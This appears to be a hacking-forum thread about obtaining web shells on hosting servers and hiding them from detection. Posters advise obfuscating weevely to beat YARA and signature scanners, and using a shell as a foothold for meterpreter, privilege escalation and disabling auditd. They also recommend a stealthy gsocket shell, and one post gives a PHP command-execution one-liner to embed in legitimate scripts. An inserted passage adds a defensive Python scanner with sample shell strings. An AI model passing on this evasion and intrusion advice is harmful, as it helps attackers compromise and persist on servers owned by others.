
I need a lot of shell


Shells stopped being relevant a long time ago: practically every hosting provider finds them automatically and removes them just as instantly.
As an alternative, go for cPanel, or those same cPanels with files uploaded to them, which may well be the shells themselves.
 
I remain optimistic that with the right modifications and optimizations things like weevely (https://github.com/epinna/weevely3) could be made to beat even the most paranoid YARA rules, even ones specifically designed to detect it.
Sorry for the off-topic, but have you had any success in the wild? Last time I played around with this tool it was always detected and removed.
The only workaround I found is, if possible, to whitelist the path the shell gets uploaded to.
 
Whether for better or worse the truth is I am not currently active so I honestly don't know. It is a disadvantage to dabble in security and not actually hack. :/

Anyway, I would work to change the code and increase randomness in every place you can, or use a PHP obfuscator. Better yet, it should be discovered how a hosting provider detects web shells and then tailor your approach to that. You should be able to beat the signature matching tools (https://github.com/emposha/PHP-Shell-Detector) very easily; even default weevely should defeat that, and you can defeat YARA-type detection (https://medium.com/@p.matkovski/yara-for-heavily-scrambled-web-shell-fcc3f8f955dc) by mixing up the primitives used - tailor to their method of detection and use different commands and frequency (requires changing weevely)... however, you will be shit out of luck against someone using proper system limiting software or even Linux auditd to watch syscalls, and if you just do normal webshell stuff you'll still be visible. Even trying to chain with resources you find like https://gtfobins.github.io/ will just add layers, but the ultimate actions will still be visible. That's just a problem (for attackers) with syscall monitoring defenses. (This is why I don't spend time on the evasion I refer to, because ultimately the syscall will be seen, and unless you have full solutions, sometimes it's just no good to spend time on it.)

The only good use for a web shell in my opinion (which I don't share often because I'm not sure whether I want the unwashed masses to wake up to this or not) is to get that initial foothold (or emergency backup foothold), which is then leveraged to deploy userspace code that can immediately try to elevate privileges (or even get to kernel space), and then with that full degree of control to implant as desired and do what is needed (in the context of this discussion, that would include disabling or setting trapdoors for auditd or other monitoring if it's done on the same host). Poking around in a webshell for the sake of it is silly when you could instead use it to run meterpreter and, better yet, focus on pivoting out of the sandbox to actually root the box. (Guess I'm old-school on that.)

To the original poster, getting "lot of shell" - are you sure you need that, or won't residential proxies cover it?
 
There is also a very short "shell" that can even be embedded in other, longer PHP scripts as cover. The code need only include
PHP:
<?=`$_GET[z]`?>
and since that can be written in different ways it is virtually impossible to have a signature for. The bottom line will be the HIPS and syscall monitoring, but short things like this can ensure you get a turn in the game.
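The post above argues that a one-liner like this cannot be signatured because it can be rewritten in many ways; the detection-side answer is to match the operation rather than the literal text. The following is an added example from a defender's perspective, not code posted in the thread or from any tool named in it: a regex-based scanner that flags PHP where request input (a superglobal) reaches a command-execution sink, either directly (the backtick operator or an exec-family function) or through a variable assigned from a superglobal earlier in the file. It does not parse PHP, so string literals and comments can cause false positives, and it deliberately does not try to follow obfuscated constructs such as variable functions; that residual gap is exactly where the syscall monitoring the thread mentions takes over. All sample files are constructed inline.

```python
"""Heuristic scanner for PHP command-execution web shells.

Added example (not code from the thread). Regex-based: it does not parse PHP,
so string literals and comments can produce false positives, and it makes no
attempt to follow obfuscated constructs such as variable functions.
"""
import re

# Request-controlled input sources.
SUPERGLOBAL = r"\$_(?:GET|POST|REQUEST|COOKIE)\b"
# Functions that hand a string to the shell or to the PHP interpreter
# (PHP function names are case-insensitive, hence the scoped (?i:...)).
SINK_FUNCS = r"(?i:shell_exec|system|exec|passthru|popen|proc_open|eval|assert)"

# `...` is PHP's shell_exec shorthand; flag it when a superglobal sits inside.
BACKTICK_SUPERGLOBAL = re.compile(r"`[^`]*" + SUPERGLOBAL + r"[^`]*`")
# A sink whose argument text (up to the statement end) contains a superglobal.
FUNC_SUPERGLOBAL = re.compile(r"\b" + SINK_FUNCS + r"\s*\([^;]*?" + SUPERGLOBAL)
# $var = $_GET... : the variable is now request-controlled ("tainted").
TAINT_ASSIGN = re.compile(r"(\$[A-Za-z_]\w*)\s*=\s*" + SUPERGLOBAL)
# Generic sink call, capturing its argument text for the taint check.
FUNC_CALL = re.compile(r"\b" + SINK_FUNCS + r"\s*\(([^;]*)")
BACKTICK_BODY = re.compile(r"`([^`]*)`")


def _uses_tainted(text: str, tainted: set[str]) -> bool:
    """True if any tainted variable name appears as a whole token in text."""
    return any(re.search(re.escape(v) + r"\b", text) for v in tainted)


def scan_php(source: str) -> list[dict]:
    """Return one finding per (line, rule) for the PHP source given."""
    findings = []
    tainted: set[str] = set()  # variables assigned directly from a superglobal
    for lineno, line in enumerate(source.splitlines(), start=1):
        # Record taint first so "$c=$_GET['c']; system($c);" on one line is seen.
        for m in TAINT_ASSIGN.finditer(line):
            tainted.add(m.group(1))
        rules = []
        # Direct patterns: request input flows straight into a sink.
        if BACKTICK_SUPERGLOBAL.search(line):
            rules.append("backtick-superglobal")
        if FUNC_SUPERGLOBAL.search(line):
            rules.append("exec-func-superglobal")
        # Indirect patterns: a tainted variable reaches a sink on this line.
        if tainted:
            if any(_uses_tainted(m.group(1), tainted) for m in BACKTICK_BODY.finditer(line)):
                rules.append("backtick-tainted-var")
            if any(_uses_tainted(m.group(1), tainted) for m in FUNC_CALL.finditer(line)):
                rules.append("exec-func-tainted-var")
        findings.extend({"line": lineno, "rule": r, "code": line.strip()} for r in rules)
    return findings


# Constructed samples (not real files from any site).
SAMPLES = {
    # The one-liner quoted in the thread: backtick operator fed from $_GET.
    "oneliner.php": "<?=`$_GET[z]`?>\n",
    # Same behaviour split over two statements; a literal-string signature
    # for the one-liner would not see this, the taint pass does.
    "indirect.php": "<?php\n$c = $_POST['cmd'];\necho shell_exec($c);\n",
    # Benign: request input is HTML-escaped and only echoed, never executed.
    "clean.php": "<?php\n$name = htmlspecialchars($_GET['name'] ?? '');\necho \"Hello, $name\";\n",
}


def scan_all(samples: dict[str, str]) -> dict[str, list[dict]]:
    """Scan every sample and map its name to the findings."""
    return {name: scan_php(src) for name, src in samples.items()}


if __name__ == "__main__":
    for name, hits in scan_all(SAMPLES).items():
        print(name, "->", [(h["line"], h["rule"]) for h in hits] or "clean")
```

Run as a script it reports the one-liner on line 1 under `backtick-superglobal`, the split version on line 3 under `exec-func-tainted-var`, and nothing for the clean file. The point of the two passes is that the second one does not care what the one-liner looks like; it cares that a request parameter ends up in a shell call, which is the property a hosting scanner actually needs to catch.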
 
You should check out https://github.com/hackerschoice/gsocket; it's a really great shell with great measures to stay hidden.
 

